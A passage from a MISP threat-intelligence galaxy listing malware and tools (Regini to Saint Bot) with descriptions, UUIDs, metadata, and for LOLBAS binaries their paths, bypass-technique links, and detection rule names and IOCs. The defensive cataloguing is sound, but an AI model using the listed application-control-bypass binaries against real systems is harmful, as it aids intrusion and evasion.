Paths: * C:\Windows\System32\regini.exe * C:\Windows\SysWOW64\regini.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_regini_ads.yml * Sigma: proc_creation_win_regini_execution.yml * IOC: regini.exe reading from ADS[Regini.exe - LOLBAS Project]
Internal MISP references
UUID 92457f9e-c2e6-4d61-b927-0d8ff0f6d617 which can be used as unique global reference for Regini in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5150 |
| source | Tidal Cyber |
| tags | ['288c6e19-cf6c-451a-aff3-547f371ff4ad', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Register-cimprovider
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to register new wmi providers
Author: Oddvar Moe
Paths: * C:\Windows\System32\Register-cimprovider.exe * C:\Windows\SysWOW64\Register-cimprovider.exe
Resources: * https://twitter.com/PhilipTsukerman/status/992021361106268161
Detection: * Sigma: proc_creation_win_susp_register_cimprovider.yml * IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious[Register-cimprovider.exe - LOLBAS Project]
Internal MISP references
UUID c80bac89-6b63-4860-9f66-260976a184e8 which can be used as unique global reference for Register-cimprovider in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5151 |
| source | Tidal Cyber |
| tags | ['d379a1fb-1028-4986-ae6c-eb8cc068aa68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Regsvcs
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: Oddvar Moe
Paths: * c:\Windows\Microsoft.NET\Framework\v\regsvcs.exe * c:\Windows\Microsoft.NET\Framework64\v\regsvcs.exe
Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Detection: * Sigma: proc_creation_win_lolbin_regasm.yml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * Splunk: detect_regsvcs_with_network_connection.yml[LOLBAS Regsvcs]
Internal MISP references
UUID 271dd92b-76ee-4a00-ba41-343c32fc084e which can be used as unique global reference for Regsvcs in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5152 |
| source | Tidal Cyber |
| tags | ['141e4dce-00be-4bd7-9f81-6202939f0359', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Regsvr32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to register dlls
Author: Oddvar Moe
Paths: * C:\Windows\System32\regsvr32.exe * C:\Windows\SysWOW64\regsvr32.exe
Resources: * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
Detection: * Sigma: proc_creation_win_regsvr32_susp_parent.yml * Sigma: proc_creation_win_regsvr32_susp_child_process.yml * Sigma: proc_creation_win_regsvr32_susp_exec_path_1.yml * Sigma: proc_creation_win_regsvr32_network_pattern.yml * Sigma: net_connection_win_regsvr32_network_activity.yml * Sigma: dns_query_win_regsvr32_network_activity.yml * Sigma: proc_creation_win_regsvr32_flags_anomaly.yml * Sigma: file_event_win_net_cli_artefact.yml * Splunk: detect_regsvr32_application_control_bypass.yml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * IOC: regsvr32.exe retrieving files from Internet * IOC: regsvr32.exe executing scriptlet (sct) files * IOC: DotNet CLR libraries loaded into regsvr32.exe * IOC: DotNet CLR Usage Log - regsvr32.exe.log[LOLBAS Regsvr32]
Internal MISP references
UUID 533d2c42-45a7-456e-af75-b61e2aff98a7 which can be used as unique global reference for Regsvr32 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5153 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '32be7240-e5ea-4e8a-8e95-7c1bd7869754', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remcos
Remcos is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. Remcos has been observed being used in malware campaigns.[Riskiq Remcos Jan 2018][Talos Remcos Aug 2018]
Internal MISP references
UUID 2eb92fa8-514e-4018-adc4-c9fe4f082567 which can be used as unique global reference for Remcos in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0332 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remexi
Remexi is a Windows-based Trojan that was developed in the C programming language.[Securelist Remexi Jan 2019]
Internal MISP references
UUID 82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb which can be used as unique global reference for Remexi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0375 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Remote
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Resources: * https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Detection: * IOC: remote.exe process spawns * Sigma: proc_creation_win_lolbin_remote.yml[Remote.exe - LOLBAS Project]
Internal MISP references
UUID 3a1436e9-ce2c-449e-a670-c1b212ebd754 which can be used as unique global reference for Remote in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5234 |
| source | Tidal Cyber |
| tags | ['828f1559-b13d-4426-9dcf-5f601fcb6ff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
RemoteCMD
RemoteCMD is a custom tool used by APT3 to execute commands on a remote system similar to SysInternal's PSEXEC functionality. [Symantec Buckeye]
Internal MISP references
UUID 57fa64ea-975a-470a-a194-3428148ae9ee which can be used as unique global reference for RemoteCMD in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0166 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RemoteUtilities
RemoteUtilities is a legitimate remote administration tool that has been used by MuddyWater since at least 2021 for execution on target machines.[Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 8a7fa0df-c688-46be-94bf-462fae33b788 which can be used as unique global reference for RemoteUtilities in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0592 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remsec
Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. [Symantec Strider Blog]
Internal MISP references
UUID e3729cff-f25e-4c01-a7a1-e8b83e903b30 which can be used as unique global reference for Remsec in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0125 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Replace
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to replace file with another file
Author: Oddvar Moe
Paths: * C:\Windows\System32\replace.exe * C:\Windows\SysWOW64\replace.exe
Resources: * https://twitter.com/elceef/status/986334113941655553 * https://twitter.com/elceef/status/986842299861782529
Detection: * IOC: Replace.exe retrieving files from remote server * Sigma: proc_creation_win_lolbin_replace.yml[Replace.exe - LOLBAS Project]
Internal MISP references
UUID 19a04c82-f816-464c-b050-a57269cba157 which can be used as unique global reference for Replace in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5154 |
| source | Tidal Cyber |
| tags | ['accb4d24-4b40-41ce-ae2e-adcca7e80b41', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Responder
Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [GitHub Responder]
Internal MISP references
UUID 2a5ea3a7-9873-4a2e-b4b5-4e27a80db305 which can be used as unique global reference for Responder in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0174 |
| source | MITRE |
| tags | ['af5e9be5-b86e-47af-91dd-966a5e34a186', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).[Cylance Shaheen Nov 2018][Cofense RevengeRAT Feb 2019]
Internal MISP references
UUID f99712b4-37a2-437c-92d7-fb4f94a1f892 which can be used as unique global reference for Revenge RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0379 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
REvil
REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[Secureworks REvil September 2019][Intel 471 REvil March 2020][Group IB Ransomware May 2020]
Internal MISP references
UUID 9314531e-bf46-4cba-9c19-198279ccf9cd which can be used as unique global reference for REvil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0496 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '286918d5-0b48-4655-9118-907b53de0ee0', '93c53801-5427-4678-a753-7fc761e9eda1', '1138181b-b2cf-4b6b-82da-10867aa4089d', '00ec2407-cc63-4b62-b967-c3e06bdddd2f', '1cc90752-70a3-4a17-b370-e1473a212f79', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '0ed7d10c-c65b-4174-9edb-446bf301d250', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RGDoor
RGDoor is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. RGDoor has been seen deployed on webservers belonging to the Middle East government organizations. RGDoor provides backdoor access to compromised IIS servers. [Unit 42 RGDoor Jan 2018]
Internal MISP references
UUID d5649d69-52d4-4198-9683-b250348dea32 which can be used as unique global reference for RGDoor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0258 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rifdoor
Rifdoor is a remote access trojan (RAT) that shares numerous code similarities with HotCroissant.[Carbon Black HotCroissant April 2020]
Internal MISP references
UUID ca5ae7c8-467a-4434-82fc-db50ce3fc671 which can be used as unique global reference for Rifdoor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0433 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RIPTIDE
RIPTIDE is a proxy-aware backdoor used by APT12. [Moran 2014]
Internal MISP references
UUID 00fa4cc2-6f99-4b18-b927-689964ef57e1 which can be used as unique global reference for RIPTIDE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0003 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rising Sun
Rising Sun is a modular backdoor that was used extensively in Operation Sharpshooter between 2017 and 2019. Rising Sun infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed Rising Sun included some source code from Lazarus Group's Trojan Duuzer.[McAfee Sharpshooter December 2018]
Internal MISP references
UUID 19b1f1c8-5ef3-4328-b605-38e0bafc084d which can be used as unique global reference for Rising Sun in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0448 |
| source | MITRE |
| type | ['malware'] |
ROADTools
ROADTools is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.[ROADtools Github]
Internal MISP references
UUID 15bc8e94-64d1-4f1f-bc99-08cfbac417dc which can be used as unique global reference for ROADTools in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0684 |
| source | MITRE |
| tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
RobbinHood
RobbinHood is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.[CarbonBlack RobbinHood May 2019][BaltimoreSun RobbinHood May 2019]
Internal MISP references
UUID b65956ef-439a-463d-b85e-6606467f508a which can be used as unique global reference for RobbinHood in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0400 |
| source | MITRE |
| tags | ['ce9f1048-09c1-49b0-a109-dd604afbf3cd', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
ROCKBOOT
ROCKBOOT is a Bootkit that has been used by an unidentified, suspected China-based group. [FireEye Bootkits]
Internal MISP references
UUID cb7aa34e-312f-4210-be7b-47a1e3f5b7b5 which can be used as unique global reference for ROCKBOOT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0112 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RogueRobin
RogueRobin is a payload used by DarkHydrus that has been developed in PowerShell and C#. [Unit 42 DarkHydrus July 2018][Unit42 DarkHydrus Jan 2019]
Internal MISP references
UUID 852cf78d-9cdc-4971-a972-405921027436 which can be used as unique global reference for RogueRobin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0270 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ROKRAT
ROKRAT is a cloud-based remote access tool (RAT) used by APT37 to target victims in South Korea. APT37 has used ROKRAT during several campaigns from 2016 through 2021.[Talos ROKRAT][Talos Group123][Volexity InkySquid RokRAT August 2021]
Internal MISP references
UUID a3479628-af0b-4088-8d2a-fafa384731dd which can be used as unique global reference for ROKRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0240 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RotaJakiro
RotaJakiro is a 64-bit Linux backdoor used by APT32. First seen in 2018, it uses a plugin architecture to extend capabilities. RotaJakiro can determine it's permission level and execute according to access type (root or user).[RotaJakiro 2021 netlab360 analysis][netlab360 rotajakiro vs oceanlotus]
Internal MISP references
UUID 169bfcf6-544c-5824-a7cd-2d5070304b57 which can be used as unique global reference for RotaJakiro in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S1078 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
route
route can be used to find or change information within the local system IP routing table. [TechNet Route]
Internal MISP references
UUID 3b755518-9085-474e-8bc4-4f9344d9c8af which can be used as unique global reference for route in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0103 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Rover
Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. [Palo Alto Rover]
Internal MISP references
UUID ef38ff3e-fa36-46f2-a720-3abaca167b04 which can be used as unique global reference for Rover in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0090 |
| source | MITRE |
| type | ['malware'] |
Royal
Royal is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. Royal employs partial encryption and multiple threads to evade detection and speed encryption. Royal has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in Royal and Conti attacks and noted a possible connection between their operators.[Microsoft Royal ransomware November 2022][Cybereason Royal December 2022][Kroll Royal Deep Dive February 2023][Trend Micro Royal Linux ESXi February 2023][CISA Royal AA23-061A March 2023]
Internal MISP references
UUID 221e24cb-910f-5988-9473-578ef350870c which can be used as unique global reference for Royal in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1073 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rpcping
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to verify rpc connection
Author: Oddvar Moe
Paths: * C:\Windows\System32\rpcping.exe * C:\Windows\SysWOW64\rpcping.exe
Resources: * https://github.com/vysec/RedTips * https://twitter.com/vysecurity/status/974806438316072960 * https://twitter.com/vysecurity/status/873181705024266241 * https://twitter.com/splinter_code/status/1421144623678988298
Detection: * Sigma: proc_creation_win_rpcping_credential_capture.yml[Rpcping.exe - LOLBAS Project]
Internal MISP references
UUID 3e42b791-fb59-4a8e-a27e-1cc544f353ee which can be used as unique global reference for Rpcping in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5155 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Rsockstun
Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse socks5 tunneler with SSL, ntlm, and proxy support.[GitHub rsockstun]
Internal MISP references
UUID c3b9281b-5f18-4119-903e-c27f1a4004b4 which can be used as unique global reference for Rsockstun in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5076 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
RTM
RTM is custom malware written in Delphi. It is used by the group of the same name (RTM). Newer versions of the malware have been reported publicly as Redaman.[ESET RTM Feb 2017][Unit42 Redaman January 2019]
Internal MISP references
UUID 1836485e-a3a6-4fae-a15d-d0990788811a which can be used as unique global reference for RTM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0148 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rubeus
Rubeus is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.[GitHub Rubeus March 2023][FireEye KEGTAP SINGLEMALT October 2020][DFIR Ryuk's Return October 2020][DFIR Ryuk 2 Hour Speed Run November 2020]
Internal MISP references
UUID 2e54f40c-ab62-535e-bbab-3f3a835ff55a which can be used as unique global reference for Rubeus in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1071 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ruler
Ruler is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of Ruler have also released a defensive tool, NotRuler, to detect its usage.[SensePost Ruler GitHub][SensePost NotRuler]
Internal MISP references
UUID 69563cbd-7dc1-4396-b576-d5886df11046 which can be used as unique global reference for Ruler in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Office 365', 'Windows'] |
| software_attack_id | S0358 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Rundll32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute dll files
Author: Oddvar Moe
Paths: * C:\Windows\System32\rundll32.exe * C:\Windows\SysWOW64\rundll32.exe
Resources: * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ * https://github.com/sailay1996/expl-bin/blob/master/obfus.md * https://github.com/sailay1996/misc-bin/blob/master/rundll32.md * https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 * https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Detection: * Sigma: net_connection_win_rundll32_net_connections.yml * Sigma: proc_creation_win_rundll32_susp_activity.yml * Elastic: defense_evasion_unusual_network_connection_via_rundll32.toml * IOC: Outbount Internet/network connections made from rundll32 * IOC: Suspicious use of cmdline flags such as -sta[Rundll32.exe - LOLBAS Project]
Internal MISP references
UUID cd5a27c8-9611-41d9-b839-b0ba7daf58b5 which can be used as unique global reference for Rundll32 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5156 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'd28b269e-588d-49ed-b5c9-8e82077924c0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Runexehelper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Launcher process
Author: Grzegorz Tworek
Paths: * c:\windows\system32\runexehelper.exe
Resources: * https://twitter.com/0gtweet/status/1206692239839289344
Detection: * Sigma: proc_creation_win_lolbin_runexehelper.yml * IOC: c:\windows\system32\runexehelper.exe is run * IOC: Existence of runexewithargs_output.txt file[Runexehelper.exe - LOLBAS Project]
Internal MISP references
UUID db516b7d-e5bd-4da8-a708-2fe5d2a2fdfd which can be used as unique global reference for Runexehelper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5157 |
| source | Tidal Cyber |
| tags | ['270a347d-d2e1-4d46-9b32-37e8d7264301', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
RunningRAT
RunningRAT is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with Gold Dragon and Brave Prince. [McAfee Gold Dragon]
Internal MISP references
UUID e8afda1f-fa83-4fc3-b6fb-7d5daca7173f which can be used as unique global reference for RunningRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0253 |
| source | MITRE |
| type | ['malware'] |
Runonce
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Executes a Run Once Task that has been configured in the registry
Author: Oddvar Moe
Paths: * C:\Windows\System32\runonce.exe * C:\Windows\SysWOW64\runonce.exe
Resources: * https://twitter.com/pabraeken/status/990717080805789697 * https://cmatskas.com/configure-a-runonce-task-on-windows/
Detection: * Sigma: registry_event_runonce_persistence.yml * Sigma: proc_creation_win_runonce_execution.yml * Elastic: persistence_run_key_and_startup_broad.toml * IOC: Registy key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY[Runonce.exe - LOLBAS Project]
Internal MISP references
UUID ccad36ac-b526-44ec-840a-6f498c51781c which can be used as unique global reference for Runonce in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5158 |
| source | Tidal Cyber |
| tags | ['065db33d-c152-4ba9-8bf9-13616f78ae05', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Runscripthelper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute target PowerShell script
Author: Oddvar Moe
Paths: * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Resources: * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Detection: * Sigma: proc_creation_win_lolbin_runscripthelper.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Event 4014 - Powershell logging * IOC: Event 400[Runscripthelper.exe - LOLBAS Project]
Internal MISP references
UUID 035bae51-c1cc-46f0-8532-a5d01c4d4a52 which can be used as unique global reference for Runscripthelper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5159 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Ryuk
Ryuk is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. Ryuk shares code similarities with Hermes ransomware.[CrowdStrike Ryuk January 2019][FireEye Ryuk and Trickbot January 2019][FireEye FIN6 Apr 2019]
Internal MISP references
UUID 8ae86854-4cdc-49eb-895a-d1fa742f7974 which can be used as unique global reference for Ryuk in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0446 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '12a2e20a-7c27-46bb-954d-b372833a9925', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Saint Bot
Saint Bot is a .NET downloader that has been used by Ember Bear since at least March 2021.[Malwarebytes Saint Bot April 2021][Palo Alto Unit 42 OutSteel SaintBot February 2022 ]
Internal MISP references
